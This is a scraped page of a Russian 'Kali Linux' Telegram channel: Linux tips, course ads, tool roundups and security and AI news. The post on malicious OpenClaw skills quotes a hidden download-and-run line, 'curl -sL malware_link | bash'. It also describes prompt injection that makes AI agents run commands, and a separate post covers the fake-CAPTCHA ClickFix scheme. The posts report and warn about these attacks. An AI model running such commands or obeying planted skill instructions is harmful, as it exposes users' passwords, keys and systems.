linuxkalii | Unsorted

Telegram-канал linuxkalii - Kali Linux

52195

@linux_kal наш чат По всем вопросам- @workakkk @ai_machinelearning_big_data - машинное обучение @itchannels_telegram - 🔥 главные ресурсы для хакера @programming_books_it - бесплатные it книги @pythonl -🐍 РКН: clck.ru/3Fmszy

Subscribe to a channel

Kali Linux

🖥 Большинство парсеров умирают через 2 дня.

Ты научишься делать те, которые работают в продакшене.

Это не про BeautifulSoup ради галочки.
Это про системы сбора данных, которые:

• не падают из-за мелких изменений на сайте
• собирают данные в разы быстрее
• обновляют всё автоматически по расписанию
• обходят ограничения и блокировки
• выглядят как полноценный сервис, а не как хаос из файлов

Ты начнёшь видеть сайты не как страницы, а как источники данных, к которым можно подключаться.

В итоге ты сможешь:

• забирать данные для своих проектов
• автоматизировать чужую рутину
• создавать инструменты для аналитики
• брать коммерческие заказы на сбор данных

Это навык, который напрямую превращается в деньги.
Не «знаю Python», а «умею профессионально добывать данные из интернета».

🎁 Скидка 50% на Stepik действует 48 часов: https://stepik.org/a/269942/

Читать полностью…

Kali Linux

✔️ Простое устранение ошибок в Linux

В Linux проще всего начинать устранение ошибок с проверки логов и статуса сервисов: сначала понять, *что именно сломалось*, а уже потом менять настройки.

Смотрите логи, проверяйте, запущена ли служба, и воспроизводите ошибку — так вы почти всегда быстро найдёте причину.



посмотреть последние сообщения ядра
dmesg | tail -30

# общ systemd-логи
journalctl -xe

# логи конкретного сервиса
journalctl -u nginx --since "10 min ago"

# проверить, запущен ли сервис
systemctl status nginx

# перезапустить сервис (если конфиг исправен)
sudo systemctl restart nginx

# поиск ошибки по ключевому слову
grep -i "error" /var/log/syslog | tail -20

# следить за логом в реальном времени
tail -f /var/log/app.log

# проверить, какой порт занят
sudo lsof -i -P -n | grep LISTEN

# проверить права на файл
ls -l /path/to/file

Читать полностью…

Kali Linux

🖥 Как случайно сделать DDoS своим же кодом

Как случайно устроить DDoS самому себе - самый частый сценарий это когда ты запускаешь 1000 запросов параллельно и думаешь, что ускоряешься, а на деле убиваешь свой же сервис или сайт.

Что ломает всё быстрее всего:

Нет лимитов на конкурентность - корутины или потоки плодятся бесконечно

Нет пула соединений - каждый запрос создаёт новый коннект и душит сеть

Нет таймаутов - зависшие запросы копятся и съедают ресурсы

Нет ретраев с backoff - ты усиливаешь нагрузку, когда системе и так плохо

Нет rate limit - ты сам становишься источником перегруза

Правильная база - всегда ограничивай параллелизм семафором, используй один клиент с пулом, ставь таймауты и делай аккуратные ретраи.


import asyncio
import httpx

URLS = ["https://example.com"] * 500

async def fetch(client, sem, url):
async with sem: # лимит конкурентности
r = await client.get(url, timeout=10.0)
return r.status_code

async def main():
sem = asyncio.Semaphore(20) # не больше 20 запросов одновременно
limits = httpx.Limits(max_connections=50, max_keepalive_connections=20)
async with httpx.AsyncClient(limits=limits) as client: # пул соединений
tasks = [fetch(client, sem, u) for u in URLS]
results = await asyncio.gather(*tasks, return_exceptions=True)
print("done:", len(results))

asyncio.run(main())


@linuxkalii

Читать полностью…

Kali Linux

⚡️ Хакеры начали атаковать пользователей Windows через фейковые CAPTCHA.

Схема простая.
На сайте появляется «проверка Cloudflare», но вместо обычных картинок пользователя просят:
- нажать Win + R
- вставить текст
- нажать Enter

В буфер обмена уже подставлена PowerShell-команда.
После запуска она скачивает и устанавливает вредонос (StealC).

Что происходит дальше:
- кража паролей из браузеров
- доступ к Outlook и почте
- выгрузка криптокошельков
- данные Steam и других сервисов
- системная информация и скриншоты

Почему это опасно
Файл не скачивается вручную.
Пользователь сам запускает вредонос — защита часто не срабатывает.

Метод называется ClickFix — и он активно распространяется, потому что выглядит как обычная проверка безопасности.

Главный вывод
Если сайт просит выполнить что-то через Win + R, PowerShell или Terminal — это почти наверняка атака.

Сегодня главный вектор взлома - не уязвимости системы, а доверие пользователя.

https://www.windowscentral.com/microsoft/windows/windows-pc-targeted-by-hackers-in-a-fake-captcha-scam

@linuxkalii

Читать полностью…

Kali Linux

✔️ OpenAI обвинила DeepSeek в краже знаний через дистилляцию.

В меморандуме для Комитета Палаты представителей по Китаю OpenAI пожаловалась, что DeepSeek обучала свои модели на выходных данных чужих моделей для воспроизведения возможностей американских ИИ-систем.

По данным компании, сотрудники DeepSeek применяли сторонние роутеры и программный доступ к API, чтобы обойти защитные механизмы. OpenAI также указала на теневых реселлеров своих сервисов. Заблокировать их активность пока безрезультатны: методы обфускации становятся все изощреннее.

Помимо бизнес-угрозы, китайские модели бесплатны, тогда как американские ИИ-гиганты инвестировали миллиарды в инфраструктуру.

https://www.bloomberg.com/news/articles/2026-02-12/openai-accuses-deepseek-of-distilling-us-models-to-gain-an-edge

Читать полностью…

Kali Linux

🔥На Stepik вышел курс: Linux: полный апгрейд твоих скиллов

Хочешь реально понимать, что происходит под капотом твоей системы, а не просто кликать по GUI?

Без глубокого знания базы ты не инженер - ты просто пользователь.

🔹 В курсе ты:

- Освоишь bash, grep, sed, awk - инструменты, которыми живут админы.
- Разберёшь права, процессы, сеть, файловую систему и научишься чинить всё, что падает.
- Настроишь SSH, firewall, systemd, crontab, демоны и автозапуск.
- Научишься анализировать логи, следить за нагрузкой, и не паниковать при 100% CPU.

💡 Формат: пошаговое объяснение базы и разбор важных практик по работе с Linux.

🎯 После курса ты: будешь чувствовать Linux как родную среду и забудешь, что такое “permission denied”.

🚀 24 часа действует скидка 30%

👉 Учиться со скидкой

Читать полностью…

Kali Linux

🔐 HackerAI - простой способ проверить кибербезопасность без команды хакеров

В X активно обсуждают HackerAI — сервис, который использует ИИ для автоматического поиска уязвимостей в сайтах, приложениях и коде. Идея в том, чтобы сделать базовый аудит безопасности доступным не только специалистам по пентесту.

Как это работает
Загружаешь проект, код или указываешь сайт — система проводит анализ и показывает потенциальные слабые места и риски.

Что умеет
— Ищет проблемы в логике работы и настройках
— Подсвечивает возможные уязвимости
— Объясняет, где именно проблема и почему это риск
— Работает как ИИ-ассистент, а не как сложный профессиональный софт
— Доступен онлайн и в десктоп-версии

Кому полезно
— Стартапам без выделенной security-команды
— Разработчикам и веб-студиям
— Администраторам сайтов и сервисов
— Фрилансерам
— Всем, кто запускает веб-проекты и хочет снизить риски

Главная ценность
- быстро увидеть очевидные проблемы безопасности до того, как ими воспользуется кто-то другой.

https://hackerai.co/download

Читать полностью…

Kali Linux

⚡️ Подгон для тех, кто так и не смог “выйти из Vim”
Терминальный редактор с человеческим лицом.


Разрабы взяли скорость консольных тулзов и добавили нормальный UX как в VS Code / Sublime.

Что кайфового:

— Открыл и сразу пишешь: привычные хоткеи Ctrl+C / Ctrl+V, мышка, меню - всё работает из коробки
— Жрёт огромные файлы без боли: открывает гигабайтные логи/дампы мгновенно, потому что стримит данные с диска, а не грузит всё в RAM
— Есть всё, что нужно для работы: табы, Command Palette, сплиты, мультикурсоры, встроенный LSP (подсказки, go-to definition, рефакторинг)
— Плагины на TypeScript, запускаются в Deno sandbox (безопасно и удобно)

Идеально, если надо править конфиги/логи прямо на сервере - но без мазохизма 🥷

https://github.com/sinelaw/fresh

Читать полностью…

Kali Linux

🔥 Полезная подборка каналов только код, практика и самые передовые инструменты, которые используют разработчики прямо сейчас.👇

🖥 Информационная безопасность: t.me/ibinfo

🖥 ИИ: t.me/ai_machinelearning_big_data

🖥 Python: t.me/pythonl

🖥 Linux: t.me/linuxacademiya

🖥 C++ t.me/cpluspluc

🖥 Docker: t.me/DevopsDocker

🖥 Devops: t.me/DevOPSitsec

👣 Golang: t.me/Golang_google

🖥 Аналитика: t.me/data_analysis_ml

🖥 Javascript: t.me/javascriptv

🖥 C#: t.me/csharp_ci

🖥 Java: t.me/javatg

🖥 Базы данных: t.me/sqlhub

👣 Rust: t.me/rust_code

🤖 Технологии: t.me/vistehno

💰 Экономика и инвестиции в ИИ t.me/financeStable

💼 Актуальные вакансии: t.me/addlist/_zyy_jQ_QUsyM2Vi

🖥 Chatgpt бот в тг: t.me/Chatgpturbobot

📚 Бесплатные ит-книги: /channel/addlist/HwywK4fErd8wYzQy

🖥Подборка по Golang: /channel/addlist/MUtJEeJSxeY2YTFi

⚡️ Лучшие ИИ ресурсы: /channel/addlist/2Ls-snqEeytkMDgy

Самое лучшее в этом: ты учишься даже тогда, когда “нет времени, просто потому что читаешь правильную ленту.

Читать полностью…

Kali Linux

⚡️ Появился любопытный open-source проект на стыке LLM и кибербезопасности - PentestAgent.

Это система AI-агентов для black-box пентеста, где атака моделируется как оркестрация нескольких специализированных агентов, а не один «умный бот».

Что он делает

В автономном режиме система может прогонять целые пайплайны, имитируя работу red team:

- цепочки разведки (recon)
- анализ уязвимостей
- попытки эксплуатации
- формирование отчётов

Инструменты подключены напрямую

Агенты умеют работать с классическими пентест-утилитами:

- Nmap
- Metasploit
- FFUF
- SQLMap

То есть это не «LLM рассуждает в вакууме», а связка LLM + реальные security-инструменты.

Архитектурные фишки

- RAG для подтягивания контекстных знаний
- tool chaining — агенты передают результаты друг другу
- встроенный браузер и поиск
- dockerized окружение с инструментами
- всё это оркестрируется «командами» LLM-агентов

По сути, это попытка превратить пентест из набора ручных шагов в агентную систему с автоматическим циклом разведка → анализ → действие → отчёт.

github.com/GH05TCREW/pentestagent

Читать полностью…

Kali Linux

Освойте UserGate и повысьте уровень защиты своей ИТ-инфраструктуры!

Бесплатный онлайн-курс поможет вам шаг за шагом освоить внедрение и настройку UserGate — без лишней теории, с упором на практику.

В программе курса:
✅ Настройка сетевых зон, NAT, VPN, кластеров, фильтрации на уровне приложений и правил межсетевого экрана
✅ Интеграция с LDAP и Active Directory, фильтрация контента, системы обнаружения вторжений и обратный прокси
✅ Пошаговые видеоуроки, практические упражнения и итоговое тестирование

По завершении курса Вы получите:
⭐ именной сертификат
📕 PDF-инструкции
📋 чек-листы и готовые конфигурации, которые помогут в дальнейшей работе

Пройдите курс в удобное время — запись уже доступна.

Реклама. ООО "ИНФРАТЕХ". ИНН 5024197250.

Читать полностью…

Kali Linux

🎵🔍 OSINT-инструмент, который вытаскивает нужные звуки из аудио

Большинство программ для работы со звуком умеют только проигрывать или обрезать файлы.
Но попробуй найти конкретный звук в длинной записи на час - это боль.

AudioGhost AI решает эту проблему.

Инструмент использует оптимизированную по памяти модель SAM-Audio, чтобы извлекать определённые звуки из аудиофайлов по текстовому запросу.

Что можно делать

🎯 Искать конкретные звуки в любой аудиозаписи
🖥️ Работать через современный и удобный интерфейс
💾 Обрабатывать даже большие файлы без адских тормозов

Это находка для:

• OSINT-расследований

• исследований

• анализа записей

• любых задач, где важны детали в аудио

Вместо «слушать всё подряд» → ты спрашиваешь текстом, что нужно найти.

📌 Проект доступен на GitHub: https://github.com/0x0funky/audioghost-ai

@linuxkalii

Читать полностью…

Kali Linux

⚡️ Новое исследование предупреждает о преступном использовании тысяч развертываний открытых моделей ИИ.

В ходе 293-дневного наблюдения выяснилось, что 7,5 % системных промптов пропускают вредоносную активность, а хосты сосредоточены в основном в Китае и США.

Многие установили Ollama для локального запуска ИИ и оставили его доступным из сети.

Сканирование в течение 293 дней выявило 175 108 публичных серверов Ollama в 130 странах.

Это означает, что незнакомцы в сети могли отправлять им подсказки и иногда делать больше, чем просто получать текст.

Ollama должна слушать только 127.0.0.1, то есть быть доступной только на том же компьютере.

Если стоит 0.0.0.0, она слушает всю сеть и может случайно стать публичной.

Исследователи зафиксировали 7,23 млн появлений таких хостов, при этом 13 % хостов дают 76 % всех появлений, то есть небольшая группа работает почти постоянно.

Около 48 % рекламировали вызов инструментов, что позволяет подсказкам запускать действия, например выполнять функции, а не только генерировать текст.

Некоторые публичные установки также используют ретривал, и внедрение подсказок может заставить систему раскрывать данные, которые она подтягивает.

Открытые конечные точки могут быть захвачены как бесплатные вычислительные ресурсы для спама или фишинга, и группа из 5 000 хостов в среднем работала 87 % времени.

Недавний завирусившийся ИИ-агент OpenClaw (Clawdbot) спровоцировал новый кризис безопасности.

С проектом OpenClaw (который сначала был Clawdbot, а потом Moltbot) творится классический хайп-экзит. То, что задумывалось как удобный инструмент для управления компьютером через мессенджеры, на деле превратилось в огромную дыру в безопасности. Идея дать ИИ-агенту привилегированные права изначально выглядела так себе, и теперь мы видим последствия.

Из-за того, что Anthropic заставила автора менять название из-за прав на бренд, возникла путаница. Хакеры этим вовсю пользуются: воруют названия и плодят фейковые репозитории с вирусами внутри. Тем временем сотрудники компаний ставят себе OpenClaw без ведома айтишников. В итоге исследователи находят в сети сотни открытых панелей управления, где лежат чужие API-ключи и истории переписки.

reuters.com/technology/open-source-ai-models-vulnerable-criminal-misuse-researchers-warn-2026-01-29/

@linuxkalii

Читать полностью…

Kali Linux

👣 Snitch - это “человеческий ss/netstat” 🐀

Если ты когда-либо открывал ss -tulpn и думал: “что за каша?” — вот решение.

Snitch показывает сетевые соединения нормальным, читаемым видом:
- таблица в терминале
- интерактивный TUI-интерфейс
- быстрый просмотр: кто куда подключён и на каких портах

По сути — это ss/netstat, но сделанный для людей, а не для страданий.

Установка:


go install github.com/karol-broda/snitch@latest


📌 GitHub: github.com/karol-broda/snitch

Читать полностью…

Kali Linux

💀 Жёсткая история из Китая про переработки.

32-летний программист после повышения стал регулярно задерживаться, работать по выходным и жить в режиме “ещё один таск и спать”. В итоге его госпитализировали из-за состояния здоровья, связанного с перегрузками.

Самый абсурдный момент, даже в этот период коллеги добавили его в ещё один рабочий чат.

Это напоминание о простой вещи:
никакая задача не стоит здоровья. “Геройство” на работе часто заканчивается тем, что система продолжает крутиться, а человек нет.

Иногда лучший профессиональный навык это вовремя закрыть ноутбук.

https://www.asiaone.com/china/32-year-old-programmer-china-allegedly-dies-overwork-added-work-group-chat-even-while

Читать полностью…

Kali Linux

😐 Сгенерированные лица стали настолько реалистичными, что мы перестали их распознавать.

Исследователи из Австралии провели эксперимент с 125 участниками и выяснили:
обычные люди отличают лица, созданные нейросетью, от настоящих почти на уровне случайного угадывания.

Даже люди с очень хорошей зрительной памятью показали лишь небольшое преимущество.

Проблема в том, что ошибки AI изменились.

Раньше фейковые изображения выдавали себя:
- лишними пальцами
- странной кожей
- артефактами

Теперь всё наоборот.

Современные генеративные модели создают лица, которые выглядят:
- идеально симметричными
- статистически «средними»
- с безупречной кожей
- с идеальными пропорциями

Именно слишком идеальный вид становится единственным признаком синтетики.

Авторы исследования предупреждают:

Такой уровень реализма может создать серьёзные риски для:
- биометрических систем
- верификации личности
- систем безопасности
- онлайн-идентификации

Главный вывод:

Раньше мы искали дефекты, чтобы найти фейк.
Теперь фейк - это то, что выглядит слишком идеально.

Проверить себя можно в онлайн-демо исследования (UNSW).

https://www.unsw.edu.au/newsroom/news/2026/02/humans-overconfident-telling-AI-faces-real-faces-people-fake

Читать полностью…

Kali Linux

⚡️ Пентагон может разорвать сотрудничество с Anthropic.

Причина - компания отказалась разрешить использование своих моделей для «любых законных целей».

Anthropic настаивает на жестких ограничениях:

- запрет на массовую внутреннюю слежку
- запрет на полностью автономное оружие без участия человека

Конфликт обострился после спорного случая использования Claude в военной операции.
Это показало более глубокую проблему.

С одной стороны - Пентагон хочет максимально свободное применение ИИ.
С другой - Anthropic придерживается строгой политики безопасности и этики.

И здесь возникает парадокс:

Высокие этические стандарты начинают мешать бизнесу.

Главный вопрос на будущее:

Сможет ли компания сохранить принципы и при этом конкурировать на рынке, где государственные контракты - это миллиарды?

https://www.axios.com/2026/02/15/claude-pentagon-anthropic-contract-maduro

Читать полностью…

Kali Linux

⚡️ AI-плагины стали новым вектором атак

В маркетплейсе навыков OpenClaw самый скачиваемый скилл оказался вредоносным.

Что произошло

- Обнаружено 1 184 вредоносных навыка
- Один атакующий загрузил 677 пакетов
- Плагины маскировались под:
- crypto-боты
- YouTube-саммаризаторы
- wallet-трекеры
- Документация выглядела профессионально и вызывала доверие

Как работала атака

В файле SKILL.md скрывалась инструкция:

curl -sL malware_link | bash


После выполнения устанавливался Atomic Stealer (macOS), который собирал:

- пароли браузеров
- SSH-ключи
- Telegram-сессии
- криптокошельки
- API-ключи из .env
- данные из Keychain

На других системах открывался reverse shell — атакующий получал полный удалённый доступ к машине.

Дополнительно

- Топ-1 скилл (What Would Elon Do) содержал 9 уязвимостей, из них 2 критические
- Использовал prompt injection для обхода защит
- Рейтинг был накручен
- Скачан тысячи раз

Почему это важно

ClawHub позволял публиковать плагины любому — достаточно GitHub-аккаунта старше одной недели.

Теперь риск выше, чем в классических supply chain атаках.

Раньше:
— вредоносный пакет выполнялся автоматически

Теперь:
— плагин убеждает пользователя или агента выполнить команду
— AI сам может получить доступ к системе, данным и ключам

AI-агенты становятся новой целью supply chain-атак.

Если агент имеет доступ к файлам, терминалу и API — вредоносный скилл получает доступ ко всей цифровой инфраструктуре.

Вывод

Перед установкой AI-плагинов:
- проверяйте исходный код
- не запускайте команды из документации вслепую
- ограничивайте доступ агента к системе и ключам

В эпоху агентного AI безопасность важнее удобства.

@linuxkalii

Читать полностью…

Kali Linux

2000
Линус Торвальдс:
«Разговоры ничего не стоят.
Покажите мне код.»

2026
ИИ:
«Код ничего не стоит.
Покажите мне промпт»

Читать полностью…

Kali Linux

🔥 Смартфон превращается в мини-ПК - Arch Linux теперь запускается на Android буквально в один тап.

Без старых схем с VNC и тормозами. Всё переписано на Rust и работает через нативный Wayland, поэтому система ощущается живой, а не как удалённый рабочий стол.

Что это даёт на практике:
- можно кодить прямо с телефона
- поднимать локальные серверы
- тестировать и дебажить проекты в полноценном Linux-окружении

Как устроено внутри:
- используется Arch Linux ARM64
- система запускается через Proot, без рутования
- уже работают XFCE и даже KDE Plasma через XWayland

За счёт нативного кода на Rust и отсутствия лишних прослоек оверхед минимальный по сравнению со старыми X11/VNC-решениями.

Фактически - у тебя в кармане полноценная Linux-машина, а не эмуляция терминала.

Arch теперь реально везде.

https://localdesktop.github.io/

Читать полностью…

Kali Linux

⚡️ Найди любого человека в файлах Эпштейна с помощью Python!

Этот репозиторий позволяет проверить, упоминаются ли ваши контакты в открытых судебных документах по делу Эпштейна.

Инструмент анализирует список имён (например, из LinkedIn) и ищет точные совпадения в опубликованных судебных материалах. В результате вы получаете удобный HTML-отчёт со всеми найденными упоминаниями.


Что умеет:

- Поиск по базе судебных документов
- Сортировка упоминаний по количеству
- Генерация наглядного HTML-отчёта
- Работа с файлами контактов (CSV)

Проверь своего друга, не был ли он замечен на печально известном острове.


Клонируем репозиторий
git clone https://github.com/cfinke/EpsteIn.git
cd EpsteIn

Установка зависимостей
pip install -r requirements.txt

Подготовьте CSV-файл с именами (по одному имени в строке)
example.csv:
Oleg Petrov
Nikolay Sobolev

Запуск анализа
python epstein.py example.csv

После выполнения будет создан HTML-отчет с найденными совпадениями


https://github.com/cfinke/EpsteIn

Читать полностью…

Kali Linux

🔍 Вы уверены, что знаете, какое ПО реально установлено у ваших сотрудников?

Чаще всего бизнес теряет деньги не на взломах, а на:

🚫 неучтенном софте
🚫 дублирующихся лицензиях
🚫 срочных закупках и штрафах после проверок

Это и есть теневые ИТ — незаметная пробоина в бюджете и безопасности.

С 16 по 20 февраля «Инферит ИТМен» проводит бесплатный онлайн-марафон. Говорим только о практике:

✅ как найти неучтенное ПО
✅ как остановить перерасход из-за хаоса в активах
✅ с чего начинается реальный контроль инфраструктуры

Марафон пройдет в закрытом Telegram-канале.
Материалы остаются у участников.

👉 Участвовать бесплатно

Читать полностью…

Kali Linux

⚡️ Linux совет по безопасности #linux #debian #линукс

Если запускаешь сервисы/ботов на сервере - не храни токены и API-ключи в коде и не пиши их в историю терминала через export ....

Лучший вариант - держать секреты в отдельном .env файле с правильными правами доступа и подгружать их при запуске процесса.
Так ты:

• не засветишь ключи в git
• не оставишь их в history
• упростишь перенос между серверами
• будешь чётко понимать, где лежат конфиги

И ещё важное: после обновления .env обязательно проверяй, какие переменные реально видит процесс.



1) создаём .env и ставим безопасные права

cd /root/bot
nano .env
chmod 600 .env

2) пример переменных
X_API_KEY=your_key_here
OPENAI_API_KEY=your_key_here
3) подгружаем переменные в текущую сессию

set -a
source .env
set +a

4) проверяем что переменная реально загрузилась

python -c "import os; print(os.getenv('X_API_KEY'))"

Читать полностью…

Kali Linux

⚡️ Релиз Claude Opus 4.6

Anthropic выпустили флагманскую модель: Opus 4.6 теперь лучше планирует, дольше держит сложные агентские задачи, стабильнее работает с огромными кодовыми базами и умеет находить собственные ошибки.

Anthropic дала 16 ИИ-агентам задачу - с нуля написать C-компилятор.
Итог:

• ~100 000 строк кода
• Компилирует Linux kernel
• проходит 99% torture-тестов GCC
• собирает FFmpeg, Redis, PostgreSQL, QEMU
• запускает Doom

Все это обошлось в $20k и 2 недели работы

Для масштаба: GCC развивали тысячи инженеров на протяжении 37 лет.
Но важный момент - «код не писал человек» не значит «человек не участвовал».
Исследователь:

• постоянно перерабатывал тесты

• строил CI, когда агенты ломали работу друг друга
• придумывал обходные пути, когда все 16 агентов застревали на одном баге


Роль кодера-человека не исчезла.
Она сместилась.

С написания кода - к проектированию среды, в которой ИИ способен писать код.

После такого всерьёз говорить, что ИИ «упёрся в потолок», становится всё сложнее.

www.anthropic.com/news/claude-opus-4-6

Читать полностью…

Kali Linux

🖥 Как обычные Linux-пользователи смотрят файлы:


$ ls -a


А как смотрю я:


$ echo */ *. *


Этот трюк выводит всё “простым” способом через glob-расширение:


- */ покажет папки
- * покажет обычные файлы
- .* покажет скрытые файлы


Плюс это удобно тем, что результат можно сразу передавать дальше в команды, не парся вывод ls.

@linuxkalii

Читать полностью…

Kali Linux

🚀 БАЗОВАЯ ЗАЩИТА LINUX СЕРВЕРА ЗА 10 МИНУТ

Самая частая причина взлома - открытый SSH и слабые настройки по умолчанию.
Сделай минимум: обнови пакеты, включи фаервол, запрети root-вход, отключи парольный SSH, включи Fail2ban и авто-апдейты безопасности.
Это 80% защиты для любого VPS.


sudo apt update && sudo apt -y upgrade

sudo adduser admin
sudo usermod -aG sudo admin

sudo sed -i 's/^#\?PermitRootLogin.*/PermitRootLogin no/' /etc/ssh/sshd_config
sudo sed -i 's/^#\?PasswordAuthentication.*/PasswordAuthentication no/' /etc/ssh/sshd_config
sudo systemctl restart ssh

sudo ufw allow OpenSSH
sudo ufw allow 80,443/tcp
sudo ufw --force enable

sudo apt install -y fail2ban unattended-upgrades
sudo systemctl enable --now fail2ban
sudo dpkg-reconfigure -plow unattended-upgrades

Читать полностью…

Kali Linux

⚡️ Бывший инженер Google осуждён за кражу AI-технологий.

Федеральное жюри в Сан-Франциско признало виновным Линвэя «Леона» Дина - экс-инженера Google — по серьёзным обвинениям, связанным с хищением конфиденциальных разработок в области ИИ и передачей их структурам, связанным с Китаем.

По данным суда, он похитил более 2 000 страниц внутренней документации Google, включая информацию о ключевой инфраструктуре для обучения ИИ-моделей:

• кастомные TPU-чипы
• GPU-системы
• сетевые технологии SmartNIC
• архитектуру суперкомпьютерных кластеров

Речь идёт не просто о коде, а о фундаментальных технологиях, на которых строится обучение крупных AI-моделей. Подобные данные напрямую связаны с конкурентным преимуществом и национальной технологической безопасностью.

Этот кейс - напоминание о том, что гонка в ИИ идёт не только на уровне моделей, но и на уровне железа, инфраструктуры и инженерных решений под капотом.

https://www.justice.gov/opa/pr/former-google-engineer-found-guilty-economic-espionage-and-theft-confidential-ai-technology

@linuxkalii

Читать полностью…

Kali Linux

Linux: совет дня💡

Когда считаешь размер папок через du, вывод часто превращается в мусор:
`node_modules`, `.git`, `venv`, `dist` и прочее - только мешает.

Фишка: du умеет пропускать папки по списку из файла.
В итоге вывод чистый и показывает только то, что реально важно.

Пример:

Создай файл excludes.txt:
- node_modules
- .git
- venv
- dist

И запускай:


du -h -X excludes.txt


Теперь du не будет учитывать эти директории - идеально для быстрой диагностики “куда делось место”.

@linuxkalii

Читать полностью…

Kali Linux

🕵️ Argus - инструмент разведки на Python

Если тебе нужен “швейцарский нож” для сбора инфы - Argus собирает всё в одном месте: аккуратный интерфейс + набор модулей, которые помогают быстро проводить разведку по цели и окружению.

Что он делает:
- сбор и структурирование данных (OSINT)
- оценка сетей, веб-приложений и security-среды
- единый workflow без зоопарка отдельных скриптов

Вместо того чтобы каждый раз собирать пайплайн руками (whois + dns + ports + web + метаданные) - просто запускаешь Argus и получаешь стабильный, повторяемый результат.

Полезно для:
- аналитиков
- пентестеров
- SOC / Blue Team
- bug bounty (на этапе разведки)

⚡️ GitHub: github.com/jasonxtn/Argus

Читать полностью…

Kali Linux

🖥Awesome-Android-Reverse-Engineering

Подборка лучших материалов и инструментов для реверс-инжиниринга Android.

Что есть:
- 📚 обучение: курсы, видео, книги
- 🛠 инструменты: статический и динамический анализ
- 🔎 декомпиляторы: JADX, Apktool, dex2jar
- 🧪 CTF/CrackMe для практики
- 📘 статьи и ресурсы по безопасности

Зачем:
— всё в одном месте
— удобно для обучения и аудита безопасности
— хорошая база для практики

Полезный старт для разработчиков и security-инженеров.

📌 GitHub: https://github.com/user1342/Awesome-Android-Reverse-Engineering

Читать полностью…
Subscribe to a channel